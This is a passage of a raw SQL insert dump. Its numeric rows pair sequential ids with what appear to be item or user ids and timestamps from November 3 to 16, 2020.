22:22:41'),(7981,2457,1,'2020-11-03','2020-11-03 22:34:37'),(7982,91,1,'2020-11-03','2020-11-03 22:36:11'),(7983,1718,1,'2020-11-03','2020-11-03 22:44:26'),(7984,1604,1,'2020-11-03','2020-11-03 23:17:57'),(7985,2751,1,'2020-11-03','2020-11-03 23:21:56'),(7986,2989,1,'2020-11-04','2020-11-04 00:08:16'),(7987,1598,1,'2020-11-04','2020-11-04 00:12:45'),(7988,3124,1,'2020-11-04','2020-11-04 00:42:55'),(7989,2813,1,'2020-11-04','2020-11-04 00:53:24'),(7990,1594,1,'2020-11-04','2020-11-04 01:23:03'),(7991,76,1,'2020-11-04','2020-11-04 01:43:27'),(7992,3107,1,'2020-11-04','2020-11-04 02:03:37'),(7993,2751,1,'2020-11-04','2020-11-04 02:03:56'),(7994,1715,1,'2020-11-04','2020-11-04 02:53:56'),(7995,3104,1,'2020-11-04','2020-11-04 03:35:19'),(7996,1724,1,'2020-11-04','2020-11-04 03:45:19'),(7997,1776,1,'2020-11-04','2020-11-04 03:58:30'),(7998,486,1,'2020-11-04','2020-11-04 03:58:37'),(7999,1608,1,'2020-11-04','2020-11-04 04:01:43'),(8000,2503,1,'2020-11-04','2020-11-04 05:15:11'),(8001,3069,1,'2020-11-04','2020-11-04 05:33:50'),(8002,2769,1,'2020-11-04','2020-11-04 05:35:24'),(8003,1588,1,'2020-11-04','2020-11-04 06:25:03'),(8004,2609,1,'2020-11-04','2020-11-04 06:55:04'),(8005,1586,1,'2020-11-04','2020-11-04 07:27:57'),(8006,1600,1,'2020-11-04','2020-11-04 07:35:37'),(8007,2309,1,'2020-11-04','2020-11-04 07:45:34'),(8008,1586,1,'2020-11-04','2020-11-04 07:49:32'),(8009,1604,1,'2020-11-04','2020-11-04 08:15:43'),(8010,570,1,'2020-11-04','2020-11-04 08:25:42'),(8011,1614,1,'2020-11-04','2020-11-04 08:35:43'),(8012,1766,1,'2020-11-04','2020-11-04 08:52:30'),(8013,1582,1,'2020-11-04','2020-11-04 08:55:55'),(8014,1739,1,'2020-11-04','2020-11-04 09:06:04'),(8015,3109,1,'2020-11-04','2020-11-04 09:22:25'),(8016,1604,1,'2020-11-04','2020-11-04 09:26:36'),(8017,2751,1,'2020-11-04','2020-11-04 09:56:03'),(8018,1600,1,'2020-11-04','2020-11-04 10:06:04'),(8019,89,1,'2020-11-04','2020-11-04 10:30:50'),(8020,89,1,'2020-11-04','2020-11-04 10:38:54'),(8021,1606,1,'2020-11-04','2020-11-04 10:46:08'),(8022,89,1,'2020-11-04','2020-11-04 11:09:50'),(8023,72,1,'2020-11-04','2020-11-04 11:36:32'),(8024,3181,1,'2020-11-04','2020-11-04 11:37:26'),(8025,2813,1,'2020-11-04','2020-11-04 11:46:46'),(8026,2309,1,'2020-11-04','2020-11-04 12:14:55'),(8027,3127,1,'2020-11-04','2020-11-04 13:03:08'),(8028,2410,1,'2020-11-04','2020-11-04 13:09:33'),(8029,1586,1,'2020-11-04','2020-11-04 13:16:09'),(8030,3034,1,'2020-11-04','2020-11-04 13:34:18'),(8031,3109,1,'2020-11-04','2020-11-04 14:01:01'),(8032,2904,1,'2020-11-04','2020-11-04 14:48:26'),(8033,1606,1,'2020-11-04','2020-11-04 15:42:51'),(8034,80,1,'2020-11-04','2020-11-04 15:43:13'),(8035,1606,1,'2020-11-04','2020-11-04 15:43:35'),(8036,3117,1,'2020-11-04','2020-11-04 16:14:53'),(8037,2457,1,'2020-11-04','2020-11-04 16:28:45'),(8038,80,1,'2020-11-04','2020-11-04 16:38:43'),(8039,3109,1,'2020-11-04','2020-11-04 17:01:19'),(8040,1614,1,'2020-11-04','2020-11-04 17:03:06'),(8041,468,1,'2020-11-04','2020-11-04 17:25:32'),(8042,3127,1,'2020-11-04','2020-11-04 17:26:20'),(8043,2769,1,'2020-11-04','2020-11-04 17:29:13'),(8044,3107,1,'2020-11-04','2020-11-04 17:40:52'),(8045,1594,1,'2020-11-04','2020-11-04 17:59:22'),(8046,108,1,'2020-11-04','2020-11-04 18:09:26'),(8047,1606,1,'2020-11-04','2020-11-04 18:26:59'),(8048,1604,1,'2020-11-04','2020-11-04 18:49:26'),(8049,2309,1,'2020-11-04','2020-11-04 19:59:48'),(8050,1586,1,'2020-11-04','2020-11-04 20:19:19'),(8051,2609,1,'2020-11-04','2020-11-04 22:06:32'),(8052,2609,1,'2020-11-04','2020-11-04 22:10:21'),(8053,2609,1,'2020-11-04','2020-11-04 22:38:00'),(8054,1606,1,'2020-11-04','2020-11-04 22:50:33'),(8055,74,1,'2020-11-04','2020-11-04 23:10:26'),(8056,3107,1,'2020-11-05','2020-11-05 00:30:52'),(8057,2309,1,'2020-11-05','2020-11-05 03:40:05'),(8058,3109,1,'2020-11-05','2020-11-05 08:04:20'),(8059,3109,1,'2020-11-05','2020-11-05 08:51:50'),(8060,1586,1,'2020-11-05','2020-11-05 11:23:19'),(8061,84,1,'2020-11-05','2020-11-05 11:26:22'),(8062,1600,1,'2020-11-05','2020-11-05 11:53:37'),(8063,3109,1,'2020-11-05','2020-11-05 12:27:02'),(8064,108,1,'2020-11-05','2020-11-05 13:57:40'),(8065,1600,1,'2020-11-05','2020-11-05 14:58:46'),(8066,1598,1,'2020-11-05','2020-11-05 15:19:58'),(8067,1598,1,'2020-11-05','2020-11-05 15:20:57'),(8068,1776,1,'2020-11-05','2020-11-05 16:02:49'),(8069,3117,1,'2020-11-05','2020-11-05 16:04:35'),(8070,1778,1,'2020-11-05','2020-11-05 20:30:52'),(8071,2309,1,'2020-11-05','2020-11-05 22:39:35'),(8072,1600,1,'2020-11-06','2020-11-06 09:21:47'),(8073,2503,1,'2020-11-06','2020-11-06 09:31:54'),(8074,2609,1,'2020-11-06','2020-11-06 09:47:15'),(8075,2769,1,'2020-11-06','2020-11-06 12:39:43'),(8076,2775,1,'2020-11-06','2020-11-06 12:40:09'),(8077,2769,1,'2020-11-06','2020-11-06 12:40:38'),(8078,2309,1,'2020-11-06','2020-11-06 12:59:22'),(8079,2309,1,'2020-11-06','2020-11-06 13:13:02'),(8080,1594,1,'2020-11-06','2020-11-06 13:20:45'),(8081,68,1,'2020-11-06','2020-11-06 14:23:14'),(8082,2410,1,'2020-11-06','2020-11-06 19:14:19'),(8083,486,1,'2020-11-06','2020-11-06 19:59:08'),(8084,3023,1,'2020-11-06','2020-11-06 21:27:21'),(8085,2309,1,'2020-11-06','2020-11-06 22:08:10'),(8086,1598,1,'2020-11-07','2020-11-07 04:37:51'),(8087,1598,1,'2020-11-07','2020-11-07 04:37:54'),(8088,1598,1,'2020-11-07','2020-11-07 04:39:04'),(8089,91,1,'2020-11-07','2020-11-07 10:56:15'),(8090,91,1,'2020-11-07','2020-11-07 10:56:19'),(8091,1743,1,'2020-11-07','2020-11-07 10:56:25'),(8092,1743,1,'2020-11-07','2020-11-07 10:56:29'),(8093,3109,1,'2020-11-07','2020-11-07 12:29:55'),(8094,3109,1,'2020-11-07','2020-11-07 12:31:20'),(8095,1606,1,'2020-11-07','2020-11-07 13:21:06'),(8096,108,1,'2020-11-07','2020-11-07 22:12:47'),(8097,1604,1,'2020-11-07','2020-11-07 22:39:19'),(8098,1600,1,'2020-11-07','2020-11-07 23:19:13'),(8099,2309,1,'2020-11-08','2020-11-08 03:44:24'),(8100,2964,1,'2020-11-08','2020-11-08 03:52:09'),(8101,2159,1,'2020-11-08','2020-11-08 08:31:05'),(8102,2309,1,'2020-11-08','2020-11-08 10:01:47'),(8103,91,1,'2020-11-08','2020-11-08 13:36:24'),(8104,1728,1,'2020-11-08','2020-11-08 13:37:03'),(8105,1586,1,'2020-11-08','2020-11-08 14:03:12'),(8106,2813,1,'2020-11-08','2020-11-08 15:16:42'),(8107,1606,1,'2020-11-08','2020-11-08 15:17:33'),(8108,1600,1,'2020-11-08','2020-11-08 16:13:38'),(8109,1592,1,'2020-11-08','2020-11-08 16:43:37'),(8110,2309,1,'2020-11-08','2020-11-08 17:11:05'),(8111,1604,1,'2020-11-08','2020-11-08 17:43:40'),(8112,1614,1,'2020-11-08','2020-11-08 18:23:40'),(8113,3069,1,'2020-11-08','2020-11-08 18:37:19'),(8114,1592,1,'2020-11-08','2020-11-08 19:24:41'),(8115,1588,1,'2020-11-08','2020-11-08 19:44:09'),(8116,2609,1,'2020-11-08','2020-11-08 19:54:17'),(8117,1582,1,'2020-11-08','2020-11-08 20:25:45'),(8118,1592,1,'2020-11-08','2020-11-08 20:36:13'),(8119,1614,1,'2020-11-08','2020-11-08 21:04:28'),(8120,1592,1,'2020-11-08','2020-11-08 21:06:33'),(8121,570,1,'2020-11-08','2020-11-08 21:24:56'),(8122,1718,1,'2020-11-08','2020-11-08 22:24:31'),(8123,3099,1,'2020-11-09','2020-11-09 00:49:12'),(8124,2309,1,'2020-11-09','2020-11-09 01:16:46'),(8125,1600,1,'2020-11-09','2020-11-09 01:56:57'),(8126,3069,1,'2020-11-09','2020-11-09 03:53:12'),(8127,1588,1,'2020-11-09','2020-11-09 05:17:59'),(8128,76,1,'2020-11-09','2020-11-09 05:48:25'),(8129,1582,1,'2020-11-09','2020-11-09 06:28:18'),(8130,1582,1,'2020-11-09','2020-11-09 06:40:30'),(8131,1614,1,'2020-11-09','2020-11-09 07:28:40'),(8132,2503,1,'2020-11-09','2020-11-09 07:59:42'),(8133,91,1,'2020-11-09','2020-11-09 08:49:18'),(8134,1722,1,'2020-11-09','2020-11-09 08:49:39'),(8135,1718,1,'2020-11-09','2020-11-09 08:55:47'),(8136,1586,1,'2020-11-09','2020-11-09 08:58:40'),(8137,1592,1,'2020-11-09','2020-11-09 09:12:22'),(8138,87,1,'2020-11-09','2020-11-09 09:13:21'),(8139,2309,1,'2020-11-09','2020-11-09 09:17:28'),(8140,87,1,'2020-11-09','2020-11-09 09:52:10'),(8141,87,1,'2020-11-09','2020-11-09 10:00:53'),(8142,2309,1,'2020-11-09','2020-11-09 10:29:50'),(8143,1588,1,'2020-11-09','2020-11-09 11:09:58'),(8144,1586,1,'2020-11-09','2020-11-09 11:17:06'),(8145,570,1,'2020-11-09','2020-11-09 11:29:49'),(8146,1586,1,'2020-11-09','2020-11-09 11:51:38'),(8147,3069,1,'2020-11-09','2020-11-09 13:00:16'),(8148,2309,1,'2020-11-09','2020-11-09 13:20:49'),(8149,1604,1,'2020-11-09','2020-11-09 14:00:01'),(8150,1612,1,'2020-11-09','2020-11-09 14:04:43'),(8151,87,1,'2020-11-09','2020-11-09 14:12:33'),(8152,2309,1,'2020-11-09','2020-11-09 14:20:09'),(8153,87,1,'2020-11-09','2020-11-09 14:30:51'),(8154,89,1,'2020-11-09','2020-11-09 14:51:49'),(8155,1604,1,'2020-11-09','2020-11-09 14:54:08'),(8156,1604,1,'2020-11-09','2020-11-09 14:56:41'),(8157,89,1,'2020-11-09','2020-11-09 15:29:29'),(8158,89,1,'2020-11-09','2020-11-09 15:35:16'),(8159,89,1,'2020-11-09','2020-11-09 15:40:05'),(8160,76,1,'2020-11-09','2020-11-09 15:50:29'),(8161,1600,1,'2020-11-09','2020-11-09 16:00:27'),(8162,1588,1,'2020-11-09','2020-11-09 16:10:33'),(8163,2297,1,'2020-11-09','2020-11-09 23:15:37'),(8164,2609,1,'2020-11-10','2020-11-10 00:32:11'),(8165,108,1,'2020-11-10','2020-11-10 01:31:01'),(8166,1604,1,'2020-11-10','2020-11-10 04:40:05'),(8167,1600,1,'2020-11-10','2020-11-10 05:33:52'),(8168,1604,1,'2020-11-10','2020-11-10 06:06:39'),(8169,1588,1,'2020-11-10','2020-11-10 06:44:52'),(8170,1600,1,'2020-11-10','2020-11-10 08:14:52'),(8171,1614,1,'2020-11-10','2020-11-10 08:28:56'),(8172,1606,1,'2020-11-10','2020-11-10 08:53:02'),(8173,1614,1,'2020-11-10','2020-11-10 09:30:15'),(8174,1604,1,'2020-11-10','2020-11-10 09:31:03'),(8175,80,1,'2020-11-10','2020-11-10 09:31:25'),(8176,89,1,'2020-11-10','2020-11-10 09:46:40'),(8177,1604,1,'2020-11-10','2020-11-10 09:47:01'),(8178,89,1,'2020-11-10','2020-11-10 09:54:28'),(8179,1586,1,'2020-11-10','2020-11-10 12:00:01'),(8180,72,1,'2020-11-10','2020-11-10 12:04:16'),(8181,1604,1,'2020-11-10','2020-11-10 12:06:25'),(8182,1586,1,'2020-11-10','2020-11-10 12:09:41'),(8183,68,1,'2020-11-10','2020-11-10 12:13:31'),(8184,1600,1,'2020-11-10','2020-11-10 12:54:23'),(8185,1600,1,'2020-11-10','2020-11-10 12:55:16'),(8186,89,1,'2020-11-10','2020-11-10 13:17:33'),(8187,1604,1,'2020-11-10','2020-11-10 13:17:52'),(8188,1604,1,'2020-11-10','2020-11-10 13:18:05'),(8189,1604,1,'2020-11-10','2020-11-10 13:45:52'),(8190,68,1,'2020-11-10','2020-11-10 13:46:07'),(8191,80,1,'2020-11-10','2020-11-10 13:51:40'),(8192,2609,1,'2020-11-10','2020-11-10 14:06:33'),(8193,2161,1,'2020-11-10','2020-11-10 14:16:55'),(8194,2813,1,'2020-11-10','2020-11-10 14:22:34'),(8195,1600,1,'2020-11-10','2020-11-10 14:56:58'),(8196,2309,1,'2020-11-10','2020-11-10 15:36:37'),(8197,89,1,'2020-11-10','2020-11-10 15:43:06'),(8198,89,1,'2020-11-10','2020-11-10 15:55:02'),(8199,89,1,'2020-11-10','2020-11-10 15:56:16'),(8200,89,1,'2020-11-10','2020-11-10 16:03:21'),(8201,1588,1,'2020-11-10','2020-11-10 16:37:31'),(8202,3069,1,'2020-11-10','2020-11-10 17:03:39'),(8203,2309,1,'2020-11-10','2020-11-10 17:13:08'),(8204,1600,1,'2020-11-10','2020-11-10 18:18:11'),(8205,1720,1,'2020-11-10','2020-11-10 18:28:11'),(8206,1614,1,'2020-11-10','2020-11-10 19:08:12'),(8207,3038,1,'2020-11-10','2020-11-10 19:51:39'),(8208,1709,1,'2020-11-10','2020-11-10 20:38:45'),(8209,1604,1,'2020-11-10','2020-11-10 21:18:46'),(8210,2658,1,'2020-11-10','2020-11-10 21:31:28'),(8211,2813,1,'2020-11-10','2020-11-10 22:53:13'),(8212,1776,1,'2020-11-10','2020-11-10 23:04:17'),(8213,2609,1,'2020-11-10','2020-11-10 23:09:02'),(8214,2159,1,'2020-11-10','2020-11-10 23:29:00'),(8215,2609,1,'2020-11-11','2020-11-11 00:18:52'),(8216,3092,1,'2020-11-11','2020-11-11 00:18:54'),(8217,2309,1,'2020-11-11','2020-11-11 00:49:00'),(8218,1600,1,'2020-11-11','2020-11-11 02:09:50'),(8219,3038,1,'2020-11-11','2020-11-11 02:42:54'),(8220,2989,1,'2020-11-11','2020-11-11 03:18:08'),(8221,1588,1,'2020-11-11','2020-11-11 03:20:21'),(8222,1614,1,'2020-11-11','2020-11-11 04:00:25'),(8223,2989,1,'2020-11-11','2020-11-11 04:03:45'),(8224,1604,1,'2020-11-11','2020-11-11 04:20:11'),(8225,570,1,'2020-11-11','2020-11-11 05:21:02'),(8226,1592,1,'2020-11-11','2020-11-11 05:30:59'),(8227,1604,1,'2020-11-11','2020-11-11 08:01:53'),(8228,1544,1,'2020-11-11','2020-11-11 08:46:48'),(8229,3127,1,'2020-11-11','2020-11-11 08:59:09'),(8230,480,1,'2020-11-11','2020-11-11 09:12:41'),(8231,3030,1,'2020-11-11','2020-11-11 09:24:07'),(8232,3069,1,'2020-11-11','2020-11-11 09:27:08'),(8233,3058,1,'2020-11-11','2020-11-11 10:02:49'),(8234,2609,1,'2020-11-11','2020-11-11 10:32:52'),(8235,2769,1,'2020-11-11','2020-11-11 10:33:01'),(8236,68,1,'2020-11-11','2020-11-11 10:37:42'),(8237,2769,1,'2020-11-11','2020-11-11 10:38:39'),(8238,91,1,'2020-11-11','2020-11-11 10:38:49'),(8239,2769,1,'2020-11-11','2020-11-11 10:40:31'),(8240,2309,1,'2020-11-11','2020-11-11 10:53:02'),(8241,1614,1,'2020-11-11','2020-11-11 11:04:37'),(8242,1600,1,'2020-11-11','2020-11-11 11:13:06'),(8243,1586,1,'2020-11-11','2020-11-11 11:25:41'),(8244,89,1,'2020-11-11','2020-11-11 11:36:24'),(8245,1614,1,'2020-11-11','2020-11-11 11:36:33'),(8246,1614,1,'2020-11-11','2020-11-11 11:39:27'),(8247,1588,1,'2020-11-11','2020-11-11 12:03:18'),(8248,1600,1,'2020-11-11','2020-11-11 12:13:29'),(8249,87,1,'2020-11-11','2020-11-11 12:15:04'),(8250,1728,1,'2020-11-11','2020-11-11 12:22:35'),(8251,1780,1,'2020-11-11','2020-11-11 12:33:41'),(8252,87,1,'2020-11-11','2020-11-11 12:37:57'),(8253,87,1,'2020-11-11','2020-11-11 12:44:09'),(8254,87,1,'2020-11-11','2020-11-11 12:52:49'),(8255,1612,1,'2020-11-11','2020-11-11 12:57:25'),(8256,89,1,'2020-11-11','2020-11-11 12:58:25'),(8257,89,1,'2020-11-11','2020-11-11 13:15:26'),(8258,1586,1,'2020-11-11','2020-11-11 13:18:23'),(8259,80,1,'2020-11-11','2020-11-11 13:19:13'),(8260,1614,1,'2020-11-11','2020-11-11 13:34:02'),(8261,2159,1,'2020-11-11','2020-11-11 13:44:14'),(8262,1612,1,'2020-11-11','2020-11-11 14:24:53'),(8263,3058,1,'2020-11-11','2020-11-11 14:34:42'),(8264,570,1,'2020-11-11','2020-11-11 14:35:22'),(8265,1774,1,'2020-11-11','2020-11-11 14:44:03'),(8266,2965,1,'2020-11-11','2020-11-11 15:00:27'),(8267,1612,1,'2020-11-11','2020-11-11 15:04:01'),(8268,2748,1,'2020-11-11','2020-11-11 15:04:49'),(8269,1612,1,'2020-11-11','2020-11-11 15:06:29'),(8270,2801,1,'2020-11-11','2020-11-11 15:29:33'),(8271,2159,1,'2020-11-11','2020-11-11 15:35:49'),(8272,2159,1,'2020-11-11','2020-11-11 15:36:09'),(8273,1614,1,'2020-11-11','2020-11-11 16:00:57'),(8274,1614,1,'2020-11-11','2020-11-11 16:05:00'),(8275,1604,1,'2020-11-11','2020-11-11 17:05:19'),(8276,1614,1,'2020-11-11','2020-11-11 17:34:39'),(8277,1612,1,'2020-11-11','2020-11-11 17:36:43'),(8278,1586,1,'2020-11-11','2020-11-11 18:05:53'),(8279,2159,1,'2020-11-11','2020-11-11 18:26:13'),(8280,1600,1,'2020-11-11','2020-11-11 18:27:07'),(8281,1772,1,'2020-11-11','2020-11-11 18:27:31'),(8282,1600,1,'2020-11-11','2020-11-11 18:27:51'),(8283,1614,1,'2020-11-11','2020-11-11 19:21:31'),(8284,1614,1,'2020-11-11','2020-11-11 19:22:52'),(8285,2813,1,'2020-11-11','2020-11-11 19:48:40'),(8286,3081,1,'2020-11-11','2020-11-11 21:20:29'),(8287,2161,1,'2020-11-11','2020-11-11 22:02:34'),(8288,2309,1,'2020-11-11','2020-11-11 22:17:43'),(8289,2161,1,'2020-11-11','2020-11-11 22:19:17'),(8290,1600,1,'2020-11-11','2020-11-11 22:37:50'),(8291,1588,1,'2020-11-11','2020-11-11 23:38:34'),(8292,1600,1,'2020-11-12','2020-11-12 00:09:18'),(8293,1614,1,'2020-11-12','2020-11-12 00:18:44'),(8294,1870,1,'2020-11-12','2020-11-12 00:39:10'),(8295,2159,1,'2020-11-12','2020-11-12 00:39:13'),(8296,570,1,'2020-11-12','2020-11-12 01:59:13'),(8297,68,1,'2020-11-12','2020-11-12 02:41:10'),(8298,74,1,'2020-11-12','2020-11-12 02:42:20'),(8299,1604,1,'2020-11-12','2020-11-12 03:39:58'),(8300,1737,1,'2020-11-12','2020-11-12 04:39:53'),(8301,1737,1,'2020-11-12','2020-11-12 05:59:41'),(8302,1751,1,'2020-11-12','2020-11-12 06:09:42'),(8303,2309,1,'2020-11-12','2020-11-12 07:50:10'),(8304,1600,1,'2020-11-12','2020-11-12 08:10:03'),(8305,89,1,'2020-11-12','2020-11-12 08:53:36'),(8306,1604,1,'2020-11-12','2020-11-12 08:54:50'),(8307,89,1,'2020-11-12','2020-11-12 08:55:03'),(8308,89,1,'2020-11-12','2020-11-12 08:59:32'),(8309,1604,1,'2020-11-12','2020-11-12 09:20:04'),(8310,84,1,'2020-11-12','2020-11-12 09:47:09'),(8311,87,1,'2020-11-12','2020-11-12 09:47:58'),(8312,91,1,'2020-11-12','2020-11-12 09:51:16'),(8313,1614,1,'2020-11-12','2020-11-12 10:18:26'),(8314,2159,1,'2020-11-12','2020-11-12 10:30:22'),(8315,1588,1,'2020-11-12','2020-11-12 10:40:31'),(8316,570,1,'2020-11-12','2020-11-12 10:50:31'),(8317,3124,1,'2020-11-12','2020-11-12 12:38:46'),(8318,2410,1,'2020-11-12','2020-11-12 12:40:03'),(8319,2609,1,'2020-11-12','2020-11-12 12:42:30'),(8320,3069,1,'2020-11-12','2020-11-12 13:26:34'),(8321,1718,1,'2020-11-12','2020-11-12 13:41:33'),(8322,2154,1,'2020-11-12','2020-11-12 13:50:27'),(8323,1600,1,'2020-11-12','2020-11-12 13:52:39'),(8324,2769,1,'2020-11-12','2020-11-12 14:11:34'),(8325,570,1,'2020-11-12','2020-11-12 14:21:14'),(8326,2410,1,'2020-11-12','2020-11-12 14:33:28'),(8327,3030,1,'2020-11-12','2020-11-12 14:57:32'),(8328,1582,1,'2020-11-12','2020-11-12 15:13:17'),(8329,1586,1,'2020-11-12','2020-11-12 15:22:06'),(8330,2457,1,'2020-11-12','2020-11-12 15:41:23'),(8331,486,1,'2020-11-12','2020-11-12 15:58:23'),(8332,3127,1,'2020-11-12','2020-11-12 16:06:02'),(8333,2769,1,'2020-11-12','2020-11-12 17:01:15'),(8334,1722,1,'2020-11-12','2020-11-12 18:22:30'),(8335,335,1,'2020-11-12','2020-11-12 19:58:16'),(8336,2161,1,'2020-11-12','2020-11-12 20:48:31'),(8337,2309,1,'2020-11-12','2020-11-12 21:12:54'),(8338,1614,1,'2020-11-12','2020-11-12 21:32:03'),(8339,2558,1,'2020-11-12','2020-11-12 21:37:52'),(8340,2161,1,'2020-11-12','2020-11-12 21:43:41'),(8341,1610,1,'2020-11-12','2020-11-12 21:48:32'),(8342,2161,1,'2020-11-12','2020-11-12 22:09:44'),(8343,3030,1,'2020-11-12','2020-11-12 22:44:30'),(8344,1604,1,'2020-11-12','2020-11-12 22:48:15'),(8345,2159,1,'2020-11-12','2020-11-12 22:53:57'),(8346,1604,1,'2020-11-12','2020-11-12 22:58:27'),(8347,2411,1,'2020-11-12','2020-11-12 23:48:20'),(8348,1606,1,'2020-11-13','2020-11-13 02:17:10'),(8349,3058,1,'2020-11-13','2020-11-13 03:37:47'),(8350,80,1,'2020-11-13','2020-11-13 04:08:05'),(8351,3056,1,'2020-11-13','2020-11-13 04:28:47'),(8352,1588,1,'2020-11-13','2020-11-13 05:28:19'),(8353,1720,1,'2020-11-13','2020-11-13 05:34:03'),(8354,486,1,'2020-11-13','2020-11-13 07:18:55'),(8355,3030,1,'2020-11-13','2020-11-13 08:09:16'),(8356,1614,1,'2020-11-13','2020-11-13 08:49:41'),(8357,1600,1,'2020-11-13','2020-11-13 10:00:49'),(8358,2309,1,'2020-11-13','2020-11-13 10:03:21'),(8359,2309,1,'2020-11-13','2020-11-13 10:10:08'),(8360,2159,1,'2020-11-13','2020-11-13 10:15:42'),(8361,2457,1,'2020-11-13','2020-11-13 10:40:48'),(8362,1722,1,'2020-11-13','2020-11-13 10:49:58'),(8363,2161,1,'2020-11-13','2020-11-13 10:54:19'),(8364,3081,1,'2020-11-13','2020-11-13 11:15:12'),(8365,1606,1,'2020-11-13','2020-11-13 12:10:03'),(8366,1544,1,'2020-11-13','2020-11-13 12:12:49'),(8367,1604,1,'2020-11-13','2020-11-13 12:50:43'),(8368,1604,1,'2020-11-13','2020-11-13 14:26:31'),(8369,1604,1,'2020-11-13','2020-11-13 14:29:22'),(8370,1604,1,'2020-11-13','2020-11-13 14:31:04'),(8371,1604,1,'2020-11-13','2020-11-13 14:31:37'),(8372,80,1,'2020-11-13','2020-11-13 15:37:05'),(8373,1604,1,'2020-11-13','2020-11-13 17:12:51'),(8374,91,1,'2020-11-13','2020-11-13 18:34:35'),(8375,91,1,'2020-11-13','2020-11-13 18:34:36'),(8376,91,1,'2020-11-13','2020-11-13 18:35:10'),(8377,2293,1,'2020-11-13','2020-11-13 18:37:12'),(8378,91,1,'2020-11-13','2020-11-13 18:39:57'),(8379,476,1,'2020-11-13','2020-11-13 18:54:00'),(8380,2609,1,'2020-11-13','2020-11-13 19:04:02'),(8381,570,1,'2020-11-13','2020-11-13 19:14:30'),(8382,2309,1,'2020-11-13','2020-11-13 20:04:28'),(8383,3058,1,'2020-11-13','2020-11-13 20:14:55'),(8384,1600,1,'2020-11-13','2020-11-13 20:35:04'),(8385,2159,1,'2020-11-13','2020-11-13 21:14:17'),(8386,2159,1,'2020-11-13','2020-11-13 21:14:23'),(8387,68,1,'2020-11-13','2020-11-13 21:21:59'),(8388,1614,1,'2020-11-13','2020-11-13 22:24:55'),(8389,3055,1,'2020-11-13','2020-11-13 23:45:43'),(8390,1592,1,'2020-11-14','2020-11-14 00:05:33'),(8391,3069,1,'2020-11-14','2020-11-14 01:17:07'),(8392,1703,1,'2020-11-14','2020-11-14 02:52:15'),(8393,1703,1,'2020-11-14','2020-11-14 02:53:54'),(8394,1606,1,'2020-11-14','2020-11-14 05:13:20'),(8395,3041,1,'2020-11-14','2020-11-14 05:38:18'),(8396,2309,1,'2020-11-14','2020-11-14 06:42:24'),(8397,1718,1,'2020-11-14','2020-11-14 06:49:17'),(8398,2609,1,'2020-11-14','2020-11-14 07:32:55'),(8399,1612,1,'2020-11-14','2020-11-14 07:48:42'),(8400,1588,1,'2020-11-14','2020-11-14 08:42:34'),(8401,1718,1,'2020-11-14','2020-11-14 08:51:23'),(8402,2159,1,'2020-11-14','2020-11-14 09:02:44'),(8403,570,1,'2020-11-14','2020-11-14 09:12:33'),(8404,1586,1,'2020-11-14','2020-11-14 10:44:12'),(8405,2801,1,'2020-11-14','2020-11-14 11:32:16'),(8406,1614,1,'2020-11-14','2020-11-14 15:17:14'),(8407,1596,1,'2020-11-14','2020-11-14 15:25:51'),(8408,2309,1,'2020-11-14','2020-11-14 17:26:19'),(8409,1600,1,'2020-11-14','2020-11-14 17:47:27'),(8410,1600,1,'2020-11-14','2020-11-14 17:48:26'),(8411,108,1,'2020-11-14','2020-11-14 19:26:22'),(8412,3030,1,'2020-11-14','2020-11-14 20:04:59'),(8413,80,1,'2020-11-14','2020-11-14 20:06:02'),(8414,1588,1,'2020-11-14','2020-11-14 20:26:01'),(8415,3058,1,'2020-11-14','2020-11-14 20:37:38'),(8416,3030,1,'2020-11-14','2020-11-14 21:24:39'),(8417,2609,1,'2020-11-14','2020-11-14 22:06:59'),(8418,1600,1,'2020-11-15','2020-11-15 00:35:12'),(8419,1604,1,'2020-11-15','2020-11-15 00:37:32'),(8420,2296,1,'2020-11-15','2020-11-15 00:57:42'),(8421,2503,1,'2020-11-15','2020-11-15 01:05:30'),(8422,2159,1,'2020-11-15','2020-11-15 01:27:46'),(8423,1600,1,'2020-11-15','2020-11-15 01:38:16'),(8424,2309,1,'2020-11-15','2020-11-15 02:58:40'),(8425,2410,1,'2020-11-15','2020-11-15 03:02:14'),(8426,1544,1,'2020-11-15','2020-11-15 03:28:47'),(8427,72,1,'2020-11-15','2020-11-15 05:32:04'),(8428,1588,1,'2020-11-15','2020-11-15 08:00:46'),(8429,2609,1,'2020-11-15','2020-11-15 08:31:07'),(8430,570,1,'2020-11-15','2020-11-15 09:03:59'),(8431,3030,1,'2020-11-15','2020-11-15 10:22:06'),(8432,2159,1,'2020-11-15','2020-11-15 11:48:48'),(8433,2309,1,'2020-11-15','2020-11-15 12:19:30'),(8434,2159,1,'2020-11-15','2020-11-15 12:23:12'),(8435,1586,1,'2020-11-15','2020-11-15 12:33:46'),(8436,2609,1,'2020-11-15','2020-11-15 12:38:59'),(8437,1586,1,'2020-11-15','2020-11-15 12:40:04'),(8438,2309,1,'2020-11-15','2020-11-15 12:53:26'),(8439,1600,1,'2020-11-15','2020-11-15 14:03:16'),(8440,1586,1,'2020-11-15','2020-11-15 14:21:44'),(8441,1586,1,'2020-11-15','2020-11-15 14:23:50'),(8442,1586,1,'2020-11-15','2020-11-15 14:24:18'),(8443,1707,1,'2020-11-15','2020-11-15 14:24:51'),(8444,3058,1,'2020-11-15','2020-11-15 14:33:48'),(8445,1584,1,'2020-11-15','2020-11-15 14:54:05'),(8446,1604,1,'2020-11-15','2020-11-15 15:03:51'),(8447,1600,1,'2020-11-15','2020-11-15 15:55:45'),(8448,1870,1,'2020-11-15','2020-11-15 17:22:21'),(8449,1604,1,'2020-11-15','2020-11-15 17:23:22'),(8450,1604,1,'2020-11-15','2020-11-15 17:23:36'),(8451,1612,1,'2020-11-15','2020-11-15 18:56:24'),(8452,1612,1,'2020-11-15','2020-11-15 20:06:12'),(8453,87,1,'2020-11-15','2020-11-15 20:17:37'),(8454,2159,1,'2020-11-15','2020-11-15 20:25:29'),(8455,2159,1,'2020-11-15','2020-11-15 21:34:06'),(8456,2159,1,'2020-11-15','2020-11-15 21:53:31'),(8457,2159,1,'2020-11-15','2020-11-15 21:59:00'),(8458,2159,1,'2020-11-15','2020-11-15 23:13:47'),(8459,2159,1,'2020-11-15','2020-11-15 23:20:09'),(8460,2159,1,'2020-11-15','2020-11-15 23:26:13'),(8461,2159,1,'2020-11-15','2020-11-15 23:32:44'),(8462,2309,1,'2020-11-15','2020-11-15 23:56:06'),(8463,1600,1,'2020-11-16','2020-11-16 00:57:41'),(8464,1604,1,'2020-11-16','2020-11-16 01:06:21'),(8465,2309,1,'2020-11-16','2020-11-16 01:16:17'),(8466,1588,1,'2020-11-16','2020-11-16 